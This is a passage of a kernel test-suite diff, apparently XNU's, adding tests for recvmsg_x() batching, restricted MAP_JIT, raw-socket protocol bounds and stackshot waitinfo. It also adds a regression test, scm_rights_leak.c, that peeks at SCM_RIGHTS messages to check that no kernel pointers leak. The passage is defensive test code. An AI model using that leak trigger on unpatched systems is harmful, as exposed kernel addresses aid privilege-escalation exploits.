"sendmsg()"); + T_LOG("Sent %ld bytes\n", n); + count += 1; + } + 
+ // Wait a bit to make sure the packets reach the receiver + usleep(100000); + + T_LOG("Sent %ld packet\n", count); + + free(bytes); +}
+
+/*
+ * Drain datagrams from non-blocking socket `s` with recvmsg_x() and log what
+ * was received.
+ *
+ * s        socket to read from
+ * numMsg   number of msghdr_x slots handed to recvmsg_x() per batch
+ * buflen   size in bytes of each per-message data buffer
+ * cmsgLen  size in bytes of each per-message control buffer
+ *
+ * The message array is used as a ring: it is re-armed every time `count`
+ * wraps to a multiple of numMsg. The loop ends when recvmsg_x() reports
+ * EWOULDBLOCK, or on any other error after the failure has been recorded.
+ */
+static void
+recvPackets_x(int s, unsigned int numMsg, size_t buflen, socklen_t cmsgLen)
+{
+	struct msghdr_x *msgList;
+	struct sockaddr_in *srcAddrs;
+	struct iovec *vec;
+	char *buffers;
+	char *cmsgBuf;
+
+	/* Nothing to receive into; also keeps `count % numMsg` well defined. */
+	if (numMsg == 0) {
+		return;
+	}
+
+	T_QUIET; T_ASSERT_NOTNULL(msgList = calloc(numMsg, sizeof(struct msghdr_x)), "msgList calloc()");
+	T_QUIET; T_ASSERT_NOTNULL(srcAddrs = calloc(numMsg, sizeof(struct sockaddr_in)), "srcAddrs calloc()");
+	T_QUIET; T_ASSERT_NOTNULL(vec = calloc(numMsg, sizeof(struct iovec)), "vec calloc()");
+	T_QUIET; T_ASSERT_NOTNULL(buffers = calloc(numMsg, buflen), "buffers calloc()");
+	T_QUIET; T_ASSERT_NOTNULL(cmsgBuf = calloc(numMsg, ALIGN(cmsgLen)), "cmsgBuf calloc()");
+
+	u_int count = 0;
+	while (true) {
+		/*
+		 * Wrap around when we've exhausted the list
+		 */
+		if ((count % numMsg) == 0) {
+			for (unsigned int i = 0; i < numMsg; i++) {
+				struct msghdr_x *msg = &msgList[i];
+				msg->msg_name = &srcAddrs[i];
+				msg->msg_namelen = sizeof(srcAddrs[i]);
+				vec[i].iov_base = buffers + (i * buflen);
+				vec[i].iov_len = buflen;
+				msg->msg_iov = &vec[i];
+				msg->msg_iovlen = 1;
+				msg->msg_control = cmsgBuf + (i * ALIGN(cmsgLen));
+				msg->msg_controllen = cmsgLen;
+				msg->msg_flags = 0;
+
+				T_QUIET; T_EXPECT_TRUE((uintptr_t)msg->msg_control % sizeof(uint32_t) == 0, NULL);
+			}
+		}
+
+		ssize_t n = recvmsg_x(s, msgList + (count % numMsg), numMsg - (count % numMsg), 0);
+		if (n < 0) {
+			/* Capture errno before any logging call can overwrite it. */
+			int saved_errno = errno;
+
+			if (saved_errno == EINTR) {
+				T_LOG("recvmsg_x(): %s", strerror(saved_errno));
+				continue;
+			}
+			if (saved_errno == EWOULDBLOCK) {
+				T_LOG("recvmsg_x(): %s", strerror(saved_errno));
+				break;
+			}
+			T_FAIL("recvmsg_x() failed: %s", strerror(saved_errno));
+			/*
+			 * T_FAIL does not stop the test. Leave the loop so the
+			 * negative return value is never used as a packet count.
+			 */
+			break;
+		}
+		T_LOG("recvmsg_x returned %ld packets\n", n);
+
+		for (unsigned int i = count; i < count + (u_int)n; i++) {
+			struct msghdr_x *msg = &msgList[i % numMsg];
+
+			T_LOG("Received packet #%d %lu bytes with recvmsg_x(), msg_namelen = %u, msg_controllen = %d -> %d, msg_flags = 0x%x\n",
+			    i + 1, msg->msg_datalen, msg->msg_namelen, cmsgLen, msg->msg_controllen, msg->msg_flags);
+
+			struct cmsghdr *cmsg;
+
+			for (cmsg = CMSG_FIRSTHDR(msg); cmsg; cmsg = CMSG_NXTHDR(msg, cmsg)) {
+				T_QUIET; T_EXPECT_TRUE((uintptr_t)cmsg % sizeof(uint32_t) == 0, NULL);
+
+				T_LOG("level = %d, type = %d, length = %d\n", cmsg->cmsg_level, cmsg->cmsg_type, cmsg->cmsg_len);
+			}
+		}
+
+		count += (u_int)n;
+	}
+
+	free(msgList);
+	free(srcAddrs);
+	free(vec);
+	free(buffers);
+	free(cmsgBuf);
+}
+
+T_DECL(recvmsg_x_test, "exercise revcmsg_x() with various parameter") +{ + struct sockaddr_in addr = { + .sin_len = sizeof(addr), + .sin_family = AF_INET, + .sin_addr.s_addr = htonl(0x7f000001), + .sin_port = 0 + }; + + int recvSocket; + T_QUIET; T_EXPECT_POSIX_SUCCESS(recvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), "socket()"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(bind(recvSocket, (const struct sockaddr *)&addr, sizeof(addr)), "bind()"); + + socklen_t addrLen = sizeof(addr); + T_QUIET; T_EXPECT_POSIX_SUCCESS(getsockname(recvSocket, (struct sockaddr *)&addr, &addrLen), "getsockname()"); + + int one = 1; + T_QUIET; T_EXPECT_POSIX_SUCCESS(setsockopt(recvSocket, IPPROTO_IP, IP_RECVPKTINFO, (void *)&one, sizeof(one)), "setsockopt(IP_RECVPKTINFO)"); + + int flags = fcntl(recvSocket, F_GETFL, 0); + T_QUIET; T_EXPECT_POSIX_SUCCESS(fcntl(recvSocket, F_SETFL, flags | O_NONBLOCK), "fcntl()"); + + int sendSocket; + T_QUIET; T_EXPECT_POSIX_SUCCESS(sendSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), "sendSocket socket()"); + + for (int dontTrunc = 0; dontTrunc <= 1; dontTrunc++) { + T_QUIET; T_EXPECT_POSIX_SUCCESS(setsockopt(recvSocket, SOL_SOCKET, SO_DONTTRUNC, (void *)&dontTrunc, sizeof(dontTrunc)), "setsockopt(SO_DONTTRUNC)"); + + T_LOG("\n================= recvmsg_x() test =================\n"); + sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN); + recvPackets_x(recvSocket, NMSGS, BUFFERLEN, 50); + + 
T_LOG("\n================= recvmsg_x() test =================\n"); + sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN); + recvPackets_x(recvSocket, NMSGS, BUFFERLEN * 2, 50); + + T_LOG("\n================= recvmsg_x() test =================\n"); + sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN); + recvPackets_x(recvSocket, NMSGS, BUFFERLEN / 2, 50); + + T_LOG("\n================= recvmsg_x() test =================\n"); + sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN); + recvPackets_x(recvSocket, NMSGS, BUFFERLEN, 10); + + T_LOG("\n================= recvmsg_x() test =================\n"); + sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN); + recvPackets_x(recvSocket, NMSGS, BUFFERLEN / 2, 10); + } + + close(sendSocket); + close(recvSocket); + + T_LOG("\n================= PASS =================\n"); +} diff --git a/tests/restrict_jit.c b/tests/restrict_jit.c new file mode 100644 index 000000000..d7f824ec1 --- /dev/null +++ b/tests/restrict_jit.c @@ -0,0 +1,33 @@ +#include +#include +#include +#include + +#include + + +/* + * macOS only test. Try to map 2 different MAP_JIT regions. 2nd should fail. 
+ */ +T_DECL(restrict_jit, "macOS restricted JIT entitlement test") +{ +#if TARGET_OS_OSX + void *addr1; + void *addr2; + size_t size = 64 * 1024; + + + addr1 = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); + T_ASSERT_NE_PTR(addr1, MAP_FAILED, "First map MAP_JIT"); + + addr2 = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); + if (addr2 == MAP_FAILED) { + T_PASS("Only one MAP_JIT was allowed"); + } else { + T_FAIL("Second MAP_JIT was allowed"); + } + +#else + T_SKIP("Not macOS"); +#endif +} diff --git a/tests/restrict_jit.entitlements b/tests/restrict_jit.entitlements new file mode 100644 index 000000000..f9b25e27c --- /dev/null +++ b/tests/restrict_jit.entitlements @@ -0,0 +1,12 @@ + + + + + dynamic-codesigning + + com.apple.security.cs.allow-jit + + com.apple.security.cs.single-jit + + + diff --git a/tests/scm_rights_leak.c b/tests/scm_rights_leak.c new file mode 100644 index 000000000..ac549b0ae --- /dev/null +++ b/tests/scm_rights_leak.c @@ -0,0 +1,108 @@ +/* + * Copyright (c) 2021 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. 
+ * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include + +#include +#include + +#include + +#define MAX_SOCK 10 + +T_DECL(scm_rights_leak, "test leak of file pointers by peeking SCM_RIGHTS") +{ + int pair[2]; + + T_ASSERT_POSIX_SUCCESS(socketpair(AF_UNIX, SOCK_STREAM, 0, pair), + NULL); + + struct cmsghdr *cmsg; + T_ASSERT_NOTNULL(cmsg = calloc(1, MAX_SOCK * sizeof(int)), "calloc"); + cmsg->cmsg_len = CMSG_LEN(MAX_SOCK * sizeof(int)); + cmsg->cmsg_level = SOL_SOCKET; + cmsg->cmsg_type = SCM_RIGHTS; + + int *sock_fds = (int *)(void *)CMSG_DATA(cmsg); + for (int i = 0; i < MAX_SOCK; i++) { + T_ASSERT_POSIX_SUCCESS(sock_fds[i] = socket(AF_UNIX, SOCK_DGRAM, 0), NULL); + } + for (int i = 0; i < MAX_SOCK; i++) { + fprintf(stderr, "sock_fds[%d] %i\n", i, sock_fds[i]); + } + + struct iovec iovec[1]; + char data = 'x'; + iovec[0].iov_base = &data; + iovec[0].iov_len = 1; + + struct msghdr mh; + mh.msg_name = 0; + mh.msg_namelen = 0; + mh.msg_iov = iovec; + mh.msg_iovlen = 1; + mh.msg_control = cmsg; + mh.msg_controllen = cmsg->cmsg_len; + mh.msg_flags = 0; + + ssize_t ssize; + ssize = sendmsg(pair[0], &mh, 0); + T_ASSERT_EQ(ssize, (ssize_t)1, "sendmsg"); + + struct cmsghdr *rcmsg; + T_EXPECT_POSIX_SUCCESS_(rcmsg = calloc(2048, 1), "calloc"); + + mh.msg_name = 0; + mh.msg_namelen = 0; + mh.msg_iov = iovec; + mh.msg_iovlen = 1; + mh.msg_control = rcmsg; + mh.msg_controllen = 2048; + mh.msg_flags = 0; + + ssize = recvmsg(pair[1], &mh, MSG_PEEK); + T_ASSERT_POSIX_SUCCESS(ssize, "recvmsg"); + 
uintptr_t *r_ptrs = (uintptr_t *)(void *)CMSG_DATA(rcmsg); + socklen_t nptrs = (rcmsg->cmsg_len - CMSG_LEN(0)) / sizeof(uintptr_t); + for (socklen_t i = 0; i < nptrs; i++) { + T_EXPECT_EQ(r_ptrs[i], (uintptr_t)0, "r_ptrs[%u] 0x%lx\n", i, r_ptrs[i]); + } + + ssize = recvmsg(pair[1], &mh, 0); + T_ASSERT_POSIX_SUCCESS(ssize, "recvmsg"); + int *r_fds = (int *)(void *)CMSG_DATA(rcmsg); + for (int i = 0; i < MAX_SOCK; i++) { + T_EXPECT_NE(r_fds[i], 0, "r_fds[%d] %i\n", i, r_fds[i]); + } + + free(cmsg); + free(rcmsg); + close(pair[0]); + close(pair[1]); +} diff --git a/tests/socket_raw_uint8_max.c b/tests/socket_raw_uint8_max.c new file mode 100644 index 000000000..44d01c166 --- /dev/null +++ b/tests/socket_raw_uint8_max.c @@ -0,0 +1,13 @@ +#include +#include + +T_DECL(socket_raw_uint8_max, "create socket with borderline proto numbers") +{ + int fd = socket(AF_INET, SOCK_RAW, 256); + + T_ASSERT_POSIX_FAILURE(fd, EINVAL, "socket(AF_INET, SOCK_RAW, 256);"); + + int fd2 = socket(AF_INET, SOCK_RAW, 255); + + T_ASSERT_POSIX_SUCCESS(fd2, "socket(AF_INET, SOCK_RAW, 255);"); +} diff --git a/tests/stackshot_tests.m b/tests/stackshot_tests.m index ce904d2d8..ae6aef50f 100644 --- a/tests/stackshot_tests.m +++ b/tests/stackshot_tests.m @@ -14,6 +14,7 @@ #include #include #include +#include #import T_GLOBAL_META( @@ -46,13 +47,17 @@ static uint64_t global_flags = 0; #define PARSE_STACKSHOT_WAITINFO_CSEG 0x40 #define PARSE_STACKSHOT_WAITINFO_SRP 0x80 #define PARSE_STACKSHOT_TRANSLATED 0x100 +#define PARSE_STACKSHOT_SHAREDCACHE_FLAGS 0x200 /* keys for 'extra' dictionary for parse_stackshot */ static const NSString* zombie_child_pid_key = @"zombie_child_pid"; // -> @(pid), required for PARSE_STACKSHOT_ZOMBIE static const NSString* postexec_child_unique_pid_key = @"postexec_child_unique_pid"; // -> @(unique_pid), required for PARSE_STACKSHOT_POSTEXEC static const NSString* cseg_expected_threadid_key = @"cseg_expected_threadid"; // -> @(tid), required for PARSE_STACKSHOT_WAITINFO_CSEG 
-static const NSString* srp_expected_pid_key = @"srp_expected_pid"; // -> @(pid), required for PARSE_STACKSHOT_WAITINFO_SRP +static const NSString* srp_expected_threadid_key = @"srp_expected_threadid"; // -> @(tid), this or ..._pid required for PARSE_STACKSHOT_WAITINFO_SRP +static const NSString* srp_expected_pid_key = @"srp_expected_pid"; // -> @(pid), this or ..._threadid required for PARSE_STACKSHOT_WAITINFO_SRP static const NSString* translated_child_pid_key = @"translated_child_pid"; // -> @(pid), required for PARSE_STACKSHOT_TRANSLATED +static const NSString* sharedcache_child_pid_key = @"sharedcache_child_pid"; // @(pid), required for PARSE_STACKSHOT_SHAREDCACHE_FLAGS +static const NSString* sharedcache_child_sameaddr_key = @"sharedcache_child_sameaddr"; // @(0 or 1), required for PARSE_STACKSHOT_SHAREDCACHE_FLAGS #define TEST_STACKSHOT_QUEUE_LABEL "houston.we.had.a.problem" #define TEST_STACKSHOT_QUEUE_LABEL_LENGTH sizeof(TEST_STACKSHOT_QUEUE_LABEL) @@ -371,19 +376,18 @@ T_DECL(stress, "test that taking stackshots for 60 seconds doesn't crash the sys STACKSHOT_SAVE_LOADINFO | STACKSHOT_SAVE_KEXT_LOADINFO | STACKSHOT_GET_GLOBAL_MEM_STATS | - // STACKSHOT_GET_BOOT_PROFILE | STACKSHOT_SAVE_IMP_DONATION_PIDS | STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT | STACKSHOT_THREAD_GROUP | STACKSHOT_SAVE_JETSAM_COALITIONS | STACKSHOT_ASID | - // STACKSHOT_PAGE_TABLES | 0), }; start_time = clock_gettime_nsec_np(CLOCK_MONOTONIC); while (clock_gettime_nsec_np(CLOCK_MONOTONIC) - start_time < max_diff_time) { - take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { + take_stackshot(&scenario, false, ^(void * __unused ssbuf, + size_t __unused sslen) { printf("."); fflush(stdout); }); @@ -435,6 +439,100 @@ T_DECL(dispatch_queue_label, "test that kcdata stackshots contain libdispatch qu dispatch_semaphore_signal(parent_done_sem); } +#define CACHEADDR_ENV "STACKSHOT_TEST_DYLDADDR" +T_HELPER_DECL(spawn_reslide_child, "child process to spawn with alternate slide") +{ + size_t 
shared_cache_len; + const void *addr, *prevaddr; + uintmax_t v; + char *endptr; + + const char *cacheaddr_env = getenv(CACHEADDR_ENV); + T_QUIET; T_ASSERT_NOTNULL(cacheaddr_env, "getenv("CACHEADDR_ENV")"); + errno = 0; + endptr = NULL; + v = strtoumax(cacheaddr_env, &endptr, 16); /* read hex value */ + T_WITH_ERRNO; T_QUIET; T_ASSERT_NE(v, 0l, "getenv(%s) = \"%s\" should be a non-zero hex number", CACHEADDR_ENV, cacheaddr_env); + T_QUIET; T_ASSERT_EQ(*endptr, 0, "getenv(%s) = \"%s\" endptr \"%s\" should be empty", CACHEADDR_ENV, cacheaddr_env, endptr); + + prevaddr = (const void *)v; + addr = _dyld_get_shared_cache_range(&shared_cache_len); + T_QUIET; T_ASSERT_NOTNULL(addr, "shared cache address"); + + T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(getppid(), (addr == prevaddr) ? SIGUSR2 : SIGUSR1), "signaled parent to take stackshot"); + for (;;) { + (void) pause(); /* parent will kill -9 us */ + } +} + +T_DECL(shared_cache_flags, "tests stackshot's task_ss_flags for the shared cache") +{ + posix_spawnattr_t attr; + char *env_addr; + char path[PATH_MAX]; + __block bool child_same_addr = false; + + uint32_t path_size = sizeof(path); + T_QUIET; T_ASSERT_POSIX_ZERO(_NSGetExecutablePath(path, &path_size), "_NSGetExecutablePath"); + char *args[] = { path, "-n", "spawn_reslide_child", NULL }; + pid_t pid; + size_t shared_cache_len; + const void *addr; + + dispatch_source_t child_diffsig_src, child_samesig_src; + dispatch_semaphore_t child_ready_sem = dispatch_semaphore_create(0); + T_QUIET; T_ASSERT_NOTNULL(child_ready_sem, "shared_cache child semaphore"); + + dispatch_queue_t signal_processing_q = dispatch_queue_create("signal processing queue", NULL); + T_QUIET; T_ASSERT_NOTNULL(signal_processing_q, "signal processing queue"); + + signal(SIGUSR1, SIG_IGN); + signal(SIGUSR2, SIG_IGN); + child_samesig_src = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, signal_processing_q); + T_QUIET; T_ASSERT_NOTNULL(child_samesig_src, "dispatch_source_create 
(child_samesig_src)"); + child_diffsig_src = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR2, 0, signal_processing_q); + T_QUIET; T_ASSERT_NOTNULL(child_diffsig_src, "dispatch_source_create (child_diffsig_src)"); + + /* child will signal us depending on if their addr is the same or different */ + dispatch_source_set_event_handler(child_samesig_src, ^{ child_same_addr = false; dispatch_semaphore_signal(child_ready_sem); }); + dispatch_source_set_event_handler(child_diffsig_src, ^{ child_same_addr = true; dispatch_semaphore_signal(child_ready_sem); }); + dispatch_activate(child_samesig_src); + dispatch_activate(child_diffsig_src); + + addr = _dyld_get_shared_cache_range(&shared_cache_len); + T_QUIET; T_ASSERT_NOTNULL(addr, "shared cache address"); + + T_QUIET; T_ASSERT_POSIX_SUCCESS(asprintf(&env_addr, "%p", addr), "asprintf of env_addr succeeded"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(setenv(CACHEADDR_ENV, env_addr, true), "setting "CACHEADDR_ENV" to %s", env_addr); + + T_QUIET; T_ASSERT_POSIX_ZERO(posix_spawnattr_init(&attr), "posix_spawnattr_init"); + T_QUIET; T_ASSERT_POSIX_ZERO(posix_spawnattr_setflags(&attr, _POSIX_SPAWN_RESLIDE), "posix_spawnattr_setflags"); + int sp_ret = posix_spawn(&pid, path, NULL, &attr, args, environ); + T_ASSERT_POSIX_ZERO(sp_ret, "spawned process '%s' with PID %d", args[0], pid); + + dispatch_semaphore_wait(child_ready_sem, DISPATCH_TIME_FOREVER); + T_LOG("received signal from child (%s), capturing stackshot", child_same_addr ? 
"same shared cache addr" : "different shared cache addr"); + + struct scenario scenario = { + .name = "shared_cache_flags", + .flags = (STACKSHOT_SAVE_LOADINFO | STACKSHOT_GET_GLOBAL_MEM_STATS + | STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT + | STACKSHOT_SAVE_IMP_DONATION_PIDS | STACKSHOT_KCDATA_FORMAT), + }; + + take_stackshot(&scenario, false, ^( void *ssbuf, size_t sslen) { + int status; + /* First kill the child so we can reap it */ + T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGKILL), "killing spawned process"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on spawned child"); + T_QUIET; T_ASSERT_EQ(!!WIFSIGNALED(status), 1, "waitpid status should be signalled"); + T_QUIET; T_ASSERT_EQ(WTERMSIG(status), SIGKILL, "waitpid status should be SIGKILLed"); + + parse_stackshot(PARSE_STACKSHOT_SHAREDCACHE_FLAGS, ssbuf, sslen, + @{sharedcache_child_pid_key: @(pid), sharedcache_child_sameaddr_key: @(child_same_addr ? 1 : 0)}); + }); +} + static void *stuck_sysctl_thread(void *arg) { int val = 1; dispatch_semaphore_t child_thread_started = *(dispatch_semaphore_t *)arg; @@ -1013,7 +1111,7 @@ static void stackshot_verify_current_proc_uuid_info(void **ssbuf, size_t sslen, T_DECL(translated, "tests translated bit is set correctly") { #if !(TARGET_OS_OSX && TARGET_CPU_ARM64) - T_SKIP("Not arm mac") + T_SKIP("Only valid on Apple silicon Macs") #endif // Get path of stackshot_translated_child helper binary char path[PATH_MAX]; @@ -1052,7 +1150,7 @@ T_DECL(translated, "tests translated bit is set correctly") struct kinfo_proc process_info; size_t bufsize = sizeof(process_info); T_QUIET; T_ASSERT_POSIX_SUCCESS(sysctl(mib, (unsigned)(sizeof(mib)/sizeof(int)), &process_info, &bufsize, NULL, 0), "get translated child process info"); - T_QUIET; T_ASSERT_GT(bufsize, 0, "process info is not empty"); + T_QUIET; T_ASSERT_GT(bufsize, (size_t)0, "process info is not empty"); T_QUIET; T_ASSERT_TRUE((process_info.kp_proc.p_flag & P_TRANSLATED), "KERN_PROC_PID reports child is 
translated"); T_LOG("capturing stackshot"); @@ -1064,13 +1162,14 @@ T_DECL(translated, "tests translated bit is set correctly") }; take_stackshot(&scenario, true, ^( void *ssbuf, size_t sslen) { - // Kill the child - int status; - T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGTERM), "kill translated child"); - T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on translated child"); - parse_stackshot(PARSE_STACKSHOT_TRANSLATED, ssbuf, sslen, @{translated_child_pid_key: @(pid)}); }); + + // Kill the child + int status; + T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGTERM), "kill translated child"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on translated child"); + } T_DECL(proc_uuid_info, "tests that the main binary UUID for a proc is always populated") @@ -1127,7 +1226,6 @@ T_DECL(proc_uuid_info, "tests that the main binary UUID for a proc is always pop T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct waitinfo") { - int val = 1; struct scenario scenario = { .name = "cseg_waitinfo", .quiet = false, @@ -1141,6 +1239,7 @@ T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct dispatch_async(dq, ^{ pthread_threadid_np(NULL, &thread_id); dispatch_semaphore_signal(child_ok); + int val = 1; T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.cseg_wedge_thread", NULL, NULL, &val, sizeof(val)), "wedge child thread"); }); @@ -1149,6 +1248,7 @@ T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct T_LOG("taking stackshot"); take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { + int val = 1; T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.cseg_unwedge_thread", NULL, NULL, &val, sizeof(val)), "unwedge child thread"); parse_stackshot(PARSE_STACKSHOT_WAITINFO_CSEG, ssbuf, sslen, @{cseg_expected_threadid_key: @(thread_id)}); }); @@ -1274,6 +1374,42 @@ T_HELPER_DECL(srp_client, T_LOG("client process exiting after sending message to parent (server)"); } +enum 
srp_test_type { + SRP_TEST_THREAD, /* expect waiter on current thread */ + SRP_TEST_PID, /* expect waiter on current PID */ + SRP_TEST_EITHER, /* waiter could be on either */ +}; + +static void +check_srp_test(const char *name, enum srp_test_type ty) +{ + struct scenario scenario = { + .name = name, + .quiet = false, + .flags = (STACKSHOT_THREAD_WAITINFO | STACKSHOT_KCDATA_FORMAT), + }; + uint64_t thread_id = 0; + pthread_threadid_np(NULL, &thread_id); + if (ty == SRP_TEST_THREAD) { + take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { + parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen, + @{srp_expected_threadid_key: @(thread_id)}); + }); + } else if (ty == SRP_TEST_PID) { + take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { + parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen, + @{srp_expected_pid_key: @(getpid())}); + }); + } else { + take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { + parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen, + @{srp_expected_pid_key: @(getpid()), srp_expected_threadid_key: @(thread_id)}); + }); + } + +} + + /* * Tests the stackshot wait info plumbing for synchronous IPC that doesn't use kevent on the server. * @@ -1285,11 +1421,14 @@ T_HELPER_DECL(srp_client, * to a server that receives the message and copies in the send-once right, but doesn't * reply to the client. for this case the special reply port is copied out and the kernel * stashes the info about which task copied out the send once right. 
(rdar://60440592) + * (part 3): tests the same as part 2, but uses kevents, which allow for + * priority inheritance */ T_DECL(special_reply_port, "test that tasks using special reply ports have correct waitinfo") { dispatch_semaphore_t can_continue = dispatch_semaphore_create(0); dispatch_queue_t dq = dispatch_queue_create("signalqueue", NULL); + dispatch_queue_t machdq = dispatch_queue_create("machqueue", NULL); dispatch_source_t sig_src; char path[PATH_MAX]; uint32_t path_size = sizeof(path); @@ -1298,11 +1437,6 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre pid_t client_pid; int sp_ret; kern_return_t kr; - struct scenario scenario = { - .name = "srp", - .quiet = false, - .flags = (STACKSHOT_THREAD_WAITINFO | STACKSHOT_KCDATA_FORMAT), - }; mach_port_t port; /* setup the signal handler in the parent (server) */ @@ -1328,18 +1462,20 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER); T_LOG("Ready to take stackshot, but waiting 1s for the coast to clear"); + /* + * can_continue indicates the client has signaled us, but we want to make + * sure they've actually blocked sending their mach message. It's cheesy, but + * sleep() works for this. + */ sleep(1); /* * take the stackshot without calling receive to verify that the stackshot wait - * info shows our (the server) PID for the scenario where the server has yet to + * info shows our (the server) thread for the scenario where the server has yet to * receive the message. 
*/ T_LOG("Taking stackshot for part 1 coverage"); - take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { - parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen, - @{srp_expected_pid_key: @(getpid())}); - }); + check_srp_test("srp", SRP_TEST_THREAD); /* * receive the message from the client (which should copy the send once right into @@ -1375,17 +1511,55 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre * for the scenario where the server has received the message and copied in the send-once right. */ T_LOG("Taking stackshot for part 2 coverage"); - take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { - parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen, - @{srp_expected_pid_key: @(getpid())}); - }); + check_srp_test("srp", SRP_TEST_PID); /* cleanup - kill the client */ - T_LOG("killing client"); - kill(client_pid, SIGKILL); + T_ASSERT_POSIX_SUCCESS(kill(client_pid, SIGKILL), "killing client"); + T_ASSERT_POSIX_SUCCESS(waitpid(client_pid, NULL, 0), "waiting for the client to exit"); + + // do it again, but using kevents + T_LOG("Launching client"); + sp_ret = posix_spawn(&client_pid, client_args[0], NULL, NULL, client_args, NULL); + T_QUIET; T_ASSERT_POSIX_ZERO(sp_ret, "spawned process '%s' with PID %d", client_args[0], client_pid); + T_LOG("Spawned client as PID %d", client_pid); - T_LOG("waiting for the client to exit"); - waitpid(client_pid, NULL, 0); + dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER); + T_LOG("Ready to take stackshot, but waiting 1s for the coast to clear"); + + /* + * can_continue indicates the client has signaled us, but we want to make + * sure they've actually blocked sending their mach message. It's cheesy, but + * sleep() works for this. 
+ */ + sleep(1); + + dispatch_mach_t dispatch_mach = dispatch_mach_create(SRP_SERVICE_NAME, machdq, + ^(dispatch_mach_reason_t reason, + dispatch_mach_msg_t message, + mach_error_t error __unused) { + switch (reason) { + case DISPATCH_MACH_MESSAGE_RECEIVED: { + size_t size = 0; + mach_msg_header_t *msg __unused = dispatch_mach_msg_get_msg(message, &size); + T_LOG("server: recieved %ld byte message", size); + check_srp_test("turnstile_port_thread", SRP_TEST_THREAD); + T_LOG("server: letting client go"); + // drop the message on the ground, we'll kill the client later + dispatch_semaphore_signal(can_continue); + break; + } + default: + break; + } + }); + + dispatch_mach_connect(dispatch_mach, port, MACH_PORT_NULL, NULL); + + dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER); + + /* cleanup - kill the client */ + T_ASSERT_POSIX_SUCCESS(kill(client_pid, SIGKILL), "killing client"); + T_ASSERT_POSIX_SUCCESS(waitpid(client_pid, NULL, 0), "waiting for the client to exit"); } #pragma mark performance tests @@ -1441,7 +1615,7 @@ stackshot_flag_perf_noclobber(uint64_t flag, char *flagname) dt_stat_t duration = dt_stat_create("nanoseconds per thread", "%s_duration", flagname); dt_stat_t size = dt_stat_create("bytes per thread", "%s_size", flagname); - T_LOG("Testing \"%s\" = 0x%x", flagname, flag); + T_LOG("Testing \"%s\" = 0x%" PRIx64, flagname, flag); while (!dt_stat_stable(duration) || !dt_stat_stable(size)) { take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { @@ -1692,6 +1866,7 @@ static void parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSDictionary *extra) { bool delta = (stackshot_parsing_flags & 